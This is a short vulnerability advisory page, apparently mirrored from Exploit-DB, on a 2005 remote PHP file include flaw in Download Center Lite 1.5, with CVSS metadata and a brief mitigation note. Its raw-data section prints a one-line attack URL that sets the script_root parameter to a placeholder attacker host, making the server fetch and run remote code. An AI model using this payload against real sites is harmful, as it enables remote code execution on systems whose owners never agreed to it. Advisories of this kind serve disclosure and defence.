header-logo
Suggest Exploit
vendor:
Download Center Lite
by:
SecurityFocus
7.5
CVSS
HIGH
Arbitrary Remote PHP File Include
94
CWE
Product Name: Download Center Lite
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:download_center_lite:download_center_lite
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

Download Center Lite Arbitrary Remote PHP File Include Vulnerability

Download Center Lite is reportedly affected by an arbitrary remote PHP file include vulnerability. This issue is due to the application failing to properly sanitize user supplied input. This vulnerability affects Download Center Lite version 1.5; earlier versions may also be affected.

Mitigation:

Input validation should be used to ensure that user supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/12726/info

Download Center Lite is reportedly affected by an arbitrary remote PHP file include vulnerability. This issue is due to the application failing to properly sanitize user supplied input.

This vulnerability affects Download Center Lite version 1.5; earlier versions may also be affected. 

http://www.example.com/[dir]/inc/download_center_lite.inc.php?script_root=http://[hacker]/

Navigation

Suggest Exploit

Services By CQR